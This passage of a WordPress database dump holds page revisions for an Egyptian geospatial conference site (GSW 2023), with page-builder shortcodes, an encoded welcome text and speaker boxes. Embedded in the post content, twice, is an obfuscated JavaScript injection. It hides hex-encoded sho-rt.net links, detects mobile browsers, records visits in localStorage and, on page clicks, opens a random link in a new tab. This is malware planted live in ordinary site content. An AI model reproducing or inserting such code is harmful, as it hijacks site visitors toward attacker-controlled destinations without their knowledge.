_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 21:56:30','2022-11-09 21:56:30','',3233,'https://gsw2023.com/?p=3254',0,'revision','',0),
(3255,1,'2022-11-09 21:58:03','2022-11-09 21:58:03','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][/vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][/vc_column][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"][/bsf-info-box][vc_row][vc_column][ultimate_video video_type=\"vimeo_video\" vimeo_video_url=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\" vimeo_start_time=\"2\" vimeo_autoplay=\"\" vimeo_loop=\"\" thumbnail=\"custom\" custom_thumb=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" play_size=\"75\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else 